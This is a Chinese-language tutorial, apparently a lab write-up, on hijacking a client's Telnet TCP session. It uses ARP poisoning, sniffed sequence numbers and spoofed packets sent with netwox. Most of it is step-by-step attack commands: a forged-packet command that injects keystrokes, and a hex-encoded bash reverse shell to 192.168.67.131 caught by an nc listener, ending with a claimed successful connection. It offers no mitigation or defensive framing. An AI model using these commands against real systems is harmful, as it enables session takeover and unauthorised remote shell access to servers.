TCP劫持攻击
攻击原理:
1、攻击者获取client与服务器的TCP会话包;利用ARP毒化或者MAC洪泛攻击。
2、观察服务器给client主机的TCP报文,获取client给server的下一个发送报文信息。
3、攻击者通过构造一个TCP的报文,该报文是client给server的下一个报文。具体参数如下:
二层的源MAC为攻击者的;
三层的源IP是client端的IP地址,目标IP是服务器的IP地址。
四层的参数需要通过查看client与服务器的数据包来获取。
我们知道服务器只能通过三层与四层的信息来判断会话。
思路:用kali伪装client给服务器发送TCP的报文,夺取client与服务器的会话,之后冒充client获取服务器的信任。
前提是需要得知对方的数据包中的序列号,ACK的作用就是用来确认对端的数据我已经收到你的上一个数据包,我现在想要下一个;如果ACK不正确就会形成ACK风暴,通信双方会不停发送ACK来请求正确的数据包。
首先抓取通信双方的数据包,显示的序列号为经过计算的,在序列号中去掉该选项,显示出真实的序列号。
攻击实现:
这里抓取客户端与服务端的数据包如下图所示:
客户端的IP为192.168.67.128,服务端IP为192.168.67.129。这个包为服务端向客户端发送的,其中我们可以看到这个参数:Next sequence number:122619768,Acknowledgment number:491665932。这两个参数在我们伪造数据包时,需要相互调换一下即可,不需要其他操作。
伪造数据包,这里使用的为netwox的40号工具包。具体参数如下:
攻击命令:
sudo netwox 40 --ip4-ttl 64 --ip4-protocol 6 --ip4-src 192.168.67.128 --ip4-dst 192.168.67.129 --tcp-src 33842 --tcp-dst 23 --tcp-seqnum 491665932 --tcp-acknum 122619786 --tcp-ack --tcp-psh --tcp-window 227--tcp-data 6c730d00
--ip4-protocol 协议号;这里需要将源目IP写为通信双方(不是攻击者的)。
即:\r是回车,\n是换行,前者使光标到行首,后者使光标下移一格。通常用的Enter是两个加起来的,即\r\n。/r的十六进制为0d00,在数据的最后加入0d00表示执行。 这里的数据是十六进制的,需要什么给服务器发送什么命令,得先转换为十六进制。
结果
服务器的回包
当真正的用户给服务端发送消息时,会出现TCP spurious retransmission的包,表现为与服务器交互没有反应,失去与服务器的会话连接。
反弹shell注入原理:
实施:
先利用kali监听需要的端口
这里我们监听8888号端口
nc -lp 8888 -vvv
将反弹shell转换为16进制
bash -i>&/dev/tcp/192.168.67.131/8888 0>&1 //这是一个shell脚本
十六进制
62617368202d693e262f6465762f7463702f3139322e3136382e36372e3133312f3838383820303e26310d00
攻击命令
sudo netwox 40 --ip4-ttl 64 --ip4-protocol 6 --ip4-src 192.168.67.128 --ip4-dst 192.168.67.129 --tcp-src 33868 --tcp-dst 23 --tcp-seqnum 995053466 --tcp-acknum 3947091214 --tcp-ack --tcp-psh --tcp-window 227 --tcp-data 62617368202d693e262f6465762f7463702f3139322e3136382e36372e3133312f3838383820303e26310d00
这里在数据的最后加上0d00,表示执行的意思
攻击成功:这里可以看到我们成功的连接上了服务器。
